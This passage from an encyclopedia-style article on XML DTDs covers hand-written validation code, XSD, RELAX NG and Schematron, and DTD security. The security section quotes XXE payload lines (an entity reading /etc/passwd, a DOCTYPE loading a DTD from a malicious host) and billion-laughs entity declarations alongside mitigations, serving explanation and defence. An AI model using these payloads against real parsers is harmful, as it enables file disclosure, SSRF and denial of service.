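    problems = []
    if root.tag != "library":
        problems.append(f"root element is {root.tag!r}, expected 'library'")
    seen = set()
    for child in root:
        if child.tag != "book":
            problems.append(f"unexpected child {child.tag!r} in library")
            continue
        # Content model (title): exactly one title child and nothing else.
        if [c.tag for c in child] != ["title"]:
            problems.append("book must contain exactly one title")
        # #REQUIRED plus ID: the attribute must be present and unique.
        isbn = child.get("isbn")
        if isbn is None:
            problems.append("book is missing the required isbn attribute")
        elif isbn in seen:
            problems.append(f"duplicate ID value {isbn!r}")
        else:
            seen.add(isbn)
    return root, problems


root, problems = check_library(LIBRARY)
print(root.find("book/title").text)
print(problems)
```

A validating processor derives all of these checks from the DTD itself. The hand-written version only shows what the declarations amount to for this one document type.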

Modern Alternatives

XML Schema Definition

XML Schema, formally known as the XML Schema Definition Language (XSD), is a World Wide Web Consortium (W3C) recommendation published on May 2, 2001, that provides an XML-based language for defining the structure, content, and data types of XML documents. Unlike DTDs, which use a separate syntax, XSD schemas are themselves XML documents, enabling seamless integration with XML tools and parsers. Key features include native support for XML namespaces to avoid naming conflicts in modular designs, complex type definitions that allow nested structures with elements and attributes, and type inheritance through extension and restriction, where new types derive from base types and ultimately from the root anyType. These capabilities address limitations in DTDs, such as the lack of namespace awareness and rigid content models.

A major advantage of XML Schema over DTDs is its datatype system, defined in Part 2 of the specification. It provides 19 primitive built-in types (including xs:string, xs:decimal, xs:date, and xs:anyURI) and over 40 built-in types overall once derived types such as xs:integer are counted. Facets restrict values further, for example a pattern facet that uses a regular expression to match email formats. This enables precise constraint enforcement on element and attribute values, far beyond DTDs' limited token-based typing.

Additionally, XSD supports both global and local element declarations as well as named, reusable types, whereas every element declaration in a DTD is global. It promotes modularity via <xs:import> for referencing schemas in different namespaces and <xs:include> for embedding schemas in the same namespace, allowing large-scale, maintainable definitions. Basic XSD syntax revolves around the <xs:schema> root element, typically declared with the namespace xmlns:xs="http://www.w3.org/2001/XMLSchema". For instance, a simple schema might define a root element with string content as follows:
xml
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="root" type="xs:string"/>
</xs:schema>
More complex structures use <xs:complexType> to specify content models like sequences or choices, with <xs:attribute> for attributes and <xs:sequence> for ordered children. Annotations enhance readability and tool support through <xs:annotation><xs:documentation>description</xs:documentation></xs:annotation>, which can be attached to any component. By the 2010s, XML Schema had emerged as the de facto standard for XML validation in web services, notably underpinning SOAP (Simple Object Access Protocol) message envelopes and WSDL (Web Services Description Language) definitions, effectively supplanting DTDs in enterprise and web applications due to its richer expressiveness and XML compatibility.
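
To make the complexType, sequence, and attribute constructs concrete, the sketch below holds one possible XSD counterpart of the library DTD from the earlier example. The type name BookType and the overall layout are illustrative choices, not taken from any published schema. Python's standard library cannot validate against XSD, so the code only confirms that the schema is well-formed XML and lists what it declares.

```python
import xml.etree.ElementTree as ET

XS = "http://www.w3.org/2001/XMLSchema"

# Hypothetical XSD counterpart of: library (book*), book (title), isbn ID #REQUIRED
LIBRARY_XSD = """<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="library">
    <xs:complexType>
      <xs:sequence>
        <xs:element name="book" type="BookType"
                    minOccurs="0" maxOccurs="unbounded"/>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
  <xs:complexType name="BookType">
    <xs:sequence>
      <xs:element name="title" type="xs:string"/>
    </xs:sequence>
    <xs:attribute name="isbn" type="xs:ID" use="required"/>
  </xs:complexType>
</xs:schema>"""

schema = ET.fromstring(LIBRARY_XSD)  # a schema is ordinary XML, so any XML parser reads it

# Element declarations in document order, with their occurrence bounds.
elements = [
    (e.get("name"), e.get("minOccurs"), e.get("maxOccurs"))
    for e in schema.iter(f"{{{XS}}}element")
]
# Attribute declarations with their datatype and use.
attributes = [
    (a.get("name"), a.get("type"), a.get("use"))
    for a in schema.iter(f"{{{XS}}}attribute")
]
print(elements)
print(attributes)
```

Here minOccurs="0" with maxOccurs="unbounded" plays the role of the DTD's * quantifier, and use="required" corresponds to #REQUIRED.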

RELAX NG and Schematron

RELAX NG, formalized through the OASIS RELAX NG Technical Committee and approved as a specification in 2001, is a schema language for XML that defines patterns for document structure and content. It has two syntaxes: an XML-based syntax that aligns with XML's native format and a compact, non-XML syntax resembling a context-free grammar for enhanced readability. Unlike DTDs, RELAX NG does not require content models to be deterministic, which allows more flexible patterns, including mixed content without DTD-style restrictions. For instance, in the compact syntax, a division element containing a title can be expressed as element div { element title { text } }, and named patterns can be defined, referenced, and extended to build modular schemas.

Schematron, which dates from around the turn of the 2000s and is standardized as ISO/IEC 19757-3, is a rule-based validation language that uses XPath expressions to assert conditions within XML documents. The current edition is ISO/IEC 19757-3:2025 (published September 2025), which introduces support for XPath 3.1 and new schema elements such as group and library for improved modularity. Schematron focuses on semantic validation rather than structural patterns, allowing checks like "if an element A exists, then element B must follow," which are difficult to express in grammar-based schemas. These assertions enable targeted reporting of violations, making Schematron particularly suited for verifying business or domain-specific rules that complement pattern-oriented languages like RELAX NG.

RELAX NG offers advantages in readability and modularity due to its grammar-like syntax and its ability to compose schemas from reusable named patterns, which makes complex document types easier to maintain than with DTDs. Schematron excels at enforcing custom business rules, such as contextual relationships across an XML instance, and is commonly used alongside grammar-based validators such as Jing, a Java-based RELAX NG validator that accepts both the XML and compact syntaxes. Since the mid-2000s, RELAX NG and Schematron have gained preference in documentation standards, notably in DocBook V5.0 onward, where RELAX NG defines the core vocabulary and Schematron adds semantic constraints, promoting extensible open standards without reliance on DTDs.

Security Implications

Common Vulnerabilities

One of the primary security risks associated with Document Type Definitions (DTDs) in XML processing is the XML External Entity (XXE) attack, where attackers exploit external entity declarations to access unauthorized resources. In an XXE attack, a malicious XML document defines an external entity using a SYSTEM identifier pointing to a local file or remote URL, such as <!ENTITY xxe SYSTEM "file:///etc/passwd">. When the entity is referenced in the document body and the parser resolves it, sensitive file contents such as account or configuration data can be disclosed. This vulnerability arises because DTDs allow parsers to resolve and incorporate external data, which can also lead to server-side request forgery (SSRF) when the parser is directed to fetch internal network resources or external malicious content.

Another significant threat is the billion laughs attack, also known as an exponential entity expansion attack, which uses the nested expansion of internal entities defined in a DTD to cause denial of service. Attackers craft a DTD with nested entities, such as <!ENTITY lol "lol"> followed by <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> (10 references), <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> (10 references), and continuing similarly up to <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> (10 references). Each of the nine levels multiplies the size by ten, so invoking &lol9; in the XML body expands to a billion copies of "lol" (approximately 3 billion characters), exhausting memory and CPU resources during parsing. This attack relies only on the DTD's entity substitution mechanism and needs no external resources, making it effective against parsers that do not limit expansion depth or size; it can crash applications or servers by inflating an input of under a kilobyte into gigabytes of output. Recent entity expansion flaws of this kind are tracked as CVE-2024-1455 (2024) and CVE-2025-3225 (2025), underscoring continued risks in unpatched third-party XML processors.

External DTD and notation loading introduce additional risks when parsers fetch DTDs from untrusted URIs specified in the DOCTYPE declaration, such as <!DOCTYPE root SYSTEM "http://malicious-site.com/evil.dtd">, which lets an attacker inject declarations of their choosing. If the remote DTD contains malicious entity declarations, the parser may incorporate them, leading to SSRF or leakage of sensitive information to attacker-controlled servers. Notations can similarly name external programs or handlers, which becomes dangerous if the application acts on them. These issues persist in environments where network access is permitted during parsing, increasing the potential for supply-chain compromises.

Historically, XXE vulnerabilities have been prevalent in PHP applications relying on libxml2, the default XML parser, because external entity processing was enabled before mitigation features were widely adopted. For instance, PHPExcel versions before 1.8.0 were susceptible to XXE via libxml2, allowing file disclosure in applications built on the library; the issue is tracked as CVE-2014-2054 and was fixed by disabling external entity loading. The introduction of libxml_disable_entity_loader() in PHP 5.2.11 provided a partial fix, but many legacy systems and unpatched codebases remain vulnerable, as seen in ongoing issues with outdated PHP versions and third-party integrations. Since PHP 8.0, however, external entity loading is disabled by default and libxml_disable_entity_loader() is deprecated, reducing risks in updated environments.
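
The growth behind the billion laughs attack can be checked arithmetically without expanding anything. The sketch below assumes the classic form of the attack with nine levels named lol1 to lol9, each holding ten references to the level beneath it. The helper expanded_length is hypothetical and computes only the length of the expansion, never the expanded text.

```python
import re

# Matches a general entity reference such as &lol3; and captures its name.
REF = re.compile(r"&([A-Za-z_][\w.-]*);")


def expanded_length(entities, name, cache=None):
    """Length of the fully expanded replacement text, computed without building it.

    Assumes the entities are not recursive, which XML forbids.
    """
    cache = {} if cache is None else cache
    if name not in cache:
        text = entities[name]
        literal = len(REF.sub("", text))  # characters that are not references
        nested = sum(expanded_length(entities, ref, cache) for ref in REF.findall(text))
        cache[name] = literal + nested
    return cache[name]


# Build the declarations: lol = "lol", lol1 = ten &lol;, ..., lol9 = ten &lol8;
entities = {"lol": "lol"}
previous = "lol"
for level in range(1, 10):
    entities[f"lol{level}"] = f"&{previous};" * 10
    previous = f"lol{level}"

declared_chars = sum(len(value) for value in entities.values())
expanded_chars = expanded_length(entities, "lol9")
print(declared_chars, expanded_chars)
```

The replacement texts total a few hundred characters, while the expansion of lol9 is 3 × 10^9 characters, which is the amplification that expansion limits in parsers are meant to cap.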

Mitigation Strategies

To mitigate security risks associated with Document Type Definitions (DTDs) in XML processing, such as XML External Entity (XXE) attacks, the primary recommendation is to disable external entity processing entirely. This can be achieved through parser-specific flags; for instance, in the libxml2 library (version 2.9.0 or later), avoid the XML_PARSE_DTDLOAD option to prevent loading external DTD subsets, avoid XML_PARSE_NOENT so that entity references are not substituted, and use XML_PARSE_NONET to block network access for entity resolution, ensuring no external resources are fetched during parsing. Similarly, in Java's DocumentBuilderFactory, enable secure processing with factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true) and disallow DOCTYPE declarations via factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true). These configurations prevent the expansion of potentially malicious entities without affecting the parsing of ordinary documents; the second Java feature rejects any document that contains a DOCTYPE declaration, so it suits applications that never need DTDs.

When DTD usage cannot be avoided, prefer internal DTD subsets from trusted sources over external ones to eliminate remote resource dependencies, as internal declarations are contained within the document and do not require network fetches. For cases involving system identifiers in external DTDs, validate them against a strict allowlist of trusted URIs in a custom entity resolver, rejecting any unapproved sources to block unauthorized data access or injection. This approach limits exposure while maintaining necessary validation, though it requires rigorous auditing of the allowlist.

Migrating to modern schema languages like XML Schema Definition (XSD) or RELAX NG provides a more secure alternative for validation, as neither relies on parameter or external entities in the manner of DTDs, so the schema itself adds no XXE surface. XSD validation focuses on structured type definitions and namespaces rather than entity resolution. Two caveats apply: an instance document can still carry a DOCTYPE unless the parser is configured to reject it, and a validator that fetches schemaLocation hints from untrusted documents can itself be abused for server-side request forgery (SSRF), so such fetching should be disabled or restricted. RELAX NG similarly emphasizes pattern-based validation without entity mechanisms, offering equivalent security benefits alongside improved expressiveness for complex documents. Secure parsing libraries aligned with OWASP guidelines, such as defusedxml in Python, further enforce these protections during migration.

Additional best practices include input sanitization by stripping or escaping DOCTYPE declarations from untrusted XML inputs before parsing, using tools like regular expressions or dedicated libraries to neutralize potential entity definitions. Network restrictions, such as firewall rules or parser options like XML_PARSE_NONET in libxml2, should prohibit all outbound connections during XML processing to counter SSRF attempts. Finally, auditing for unparsed entities, notations, and entity expansions is essential; limit the size of entity expansion (e.g., via MaxCharactersFromEntities in .NET) and scan code with static analysis tools to detect insecure parser configurations. These measures collectively address common vulnerabilities like XXE by prioritizing prevention over detection.
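
Rejecting DOCTYPE declarations outright, the strictest of the measures above, can be sketched with Python's standard-library expat bindings. The names DoctypeForbidden and parse_rejecting_doctype are hypothetical, and the sketch only collects element names to stay short. It illustrates the idea and is not a replacement for a maintained library such as defusedxml.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an input document carries a DOCTYPE declaration."""


def parse_rejecting_doctype(xml_text):
    """Return the element names in document order, refusing any DOCTYPE."""
    names = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called when the DOCTYPE declaration starts; raising here aborts the
        # parse before any element content or entity reference is handled.
        raise DoctypeForbidden(f"DOCTYPE declaration for {name!r} rejected")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_text, True)
    return names


# Illustrative untrusted input using the external entity pattern shown earlier.
UNTRUSTED = """<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>
"""

print(parse_rejecting_doctype("<a><b/></a>"))
try:
    parse_rejecting_doctype(UNTRUSTED)
except DoctypeForbidden as error:
    print("rejected:", error)
```

Refusing the declaration as a whole covers external entities and entity expansion at once, at the cost of also refusing legitimate documents that rely on a DTD.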
